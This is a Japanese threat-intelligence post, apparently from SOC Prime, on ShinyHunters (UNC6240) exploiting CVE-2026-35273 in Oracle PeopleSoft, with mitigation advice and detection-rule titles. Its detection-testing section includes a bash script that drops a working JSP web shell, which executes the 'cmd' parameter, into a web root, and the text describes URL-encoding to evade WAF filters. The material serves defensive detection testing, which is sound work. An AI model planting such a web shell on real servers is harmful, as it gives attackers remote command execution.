SOC Prime Bias: Critical

01 Oct 2026 07:53 UTC

ShinyHuntersがOracle PeopleSoftを標的とした大規模攻撃を再開

Author Photo
SOC Prime Team linkedin icon フォローする
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

要約

脅威アクターUNC6240(ShinyHunters)は、CVE-2026-35273を通じてOracle PeopleSoftシステムの大規模なエクスプロイトを再開しました。このキャンペーンは、URLエンコードされたパスを活用してWebアプリケーションファイアウォール(WAF)を回避し、脆弱な環境管理ハブのエンドポイントにアクセスします。攻撃者は複数のWebシェルをSIDEEYEバックドアと共に展開し、持続性を確立し、無許可のアクセスを維持し、データの流出を容易にします。

調査

MandiantとGoogle脅威インテリジェンスグループは、2026年6月のゼロデイのエクスプロイトから、未パッチの環境に対するN-day攻撃への移行を文書化しました。研究者はURLエンコーディングの使用を特定しました(/PSEMHUB/)を利用して、文字列ベースのWAFフィルタリングを回避します。分析により、ターゲットの検証から直列化されたJavaオブジェクトを使用した後、トロイの木馬化されたインストーラーおよびトンネルユーティリティの展開を伴う再発攻撃シーケンスが明らかになりました。

緩和策

組織は、CVE-2026-35273を対象としたOracleセキュリティアラートパッチを直ちにインストールし、PSEMHUBアプリケーションを無効または削除する必要があります。WAF設定は、文字通りの文字列の一致にのみ依存するのではなく、正規化されたURLパスを検査しブロックする必要があります。セキュリティチームは、Web階層からアクセス可能な資格情報を変更し、不審または無許可のファイルがアプリケーションディレクトリにないか確認すべきです。

対応

Webシェルが発見された場合、防御者は影響を受けたホストが完全に侵害されたと見なし、修復前にフォレンジック証拠を保存すべきです。WebLogic Javaプロセスによって起動された予期しないシェルプロセスを識別するために、ホストレベルの監査を有効にします。公開されている資格情報、データベース接続文字列、クラウド資格情報を回転させ、既知のC2指標のためにアウトバウンドネットワークアクティビティを確認します。

攻撃フロー

この部分はまだ更新中です。

検出

可能なシステムの列挙(コマンドライン経由)

SOC Prime Team
2026年9月29日

異常なトップレベルドメイン(TLD)DNS要求による疑わしいコマンド&コントロール(DNS経由)

SOC Prime Team
2026年9月29日

Base64エンコードされた文字列操作の可能性(コマンドライン経由)

SOC Prime Team
2026年9月29日

標準ツールを介したリモートファイルのアップロード/ダウンロード(コマンドライン経由)

SOC Prime Team
2026年9月29日

IOC(HashSha256)によって検出:Oracle PeopleSoftを対象にしたShinyHuntersによる大規模エクスプロイトキャンペーンの再活性化

SOC Prime AI Rules
2026年9月29日

IOC(SourceIP)によって検出:Oracle PeopleSoftを対象にしたShinyHuntersによる大規模エクスプロイトキャンペーンの再活性化

SOC Prime AI Rules
2026年9月29日

IOC(DestinationIP)によって検出:Oracle PeopleSoftを対象にしたShinyHuntersによる大規模エクスプロイトキャンペーンの再活性化

SOC Prime AI Rules
2026年9月29日

CVE-2026-35273のエクスプロイトによるWebシェルの展開[Windowsプロセスの作成]

SOC Prime AI Rules
2026年9月29日

UNC6240によるOracle PeopleSoftのエクスプロイト(Webシェルを使用した)[Webサーバー]

SOC Prime AI Rules
2026年9月29日

シミュレーションの実行

  • 攻撃のナラティブとコマンド: 敵はOracle PeopleSoftインスタンスを特定し、脆弱性を悪用しようとします。「PSEMHUB」文字列を探す単純なWAF署名を回避するため、攻撃者はURLエンコードを使用してリクエストします。 /PSEMHUB/。エクスプロイトが成功すると、攻撃者は x.jsp という名前のWebシェルをWebルートにドロップし、コマンド実行のための持続的なインターフェースを提供します。このシーケンスはUNC6240エクスプロイトキャンペーンで特定された特定の侵害指標(IOC)を模倣します。

  • 回帰テストスクリプト:

    #!/bin/bash
    # UNC6240 Webシェル検出のためのシミュレーションスクリプト
    
    # 1. パスを定義(ターゲット環境に応じて調整)
    WEB_ROOT="/var/www/html"
    SHELL_NAME="x.jsp"
    TARGET_URL="http://localhost/PSEMHUB/"
    
    echo "[+] シミュレートされたWebシェルを作成中: $WEB_ROOT/$SHELL_NAME"
    # シンプルなJSP Webシェルコンテンツを作成
    echo '<% out.print(new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("A").next()); %>' | sudo tee $WEB_ROOT/$SHELL_NAME > /dev/null
    
    echo "[+] URLエンコードされたリクエストによる検出をトリガーする..."
    # エンコードされたパスをリクエストしてログエントリを生成するためにcurlを使用
    curl -s "$TARGET_URL" > /dev/null
    
    echo "[+] シミュレーション完了。SIEMを確認して検出してください。"
  • クリーンアップコマンド:

    #!/bin/bash
    # クリーンアップスクリプト
    
    WEB_ROOT="/var/www/html"
    SHELL_NAME="x.jsp"
    
    echo "[+] シミュレーションファイルを掃除中..."
    sudo rm -f $WEB_ROOT/$SHELL_NAME
    echo "[+] クリーンアップ完了."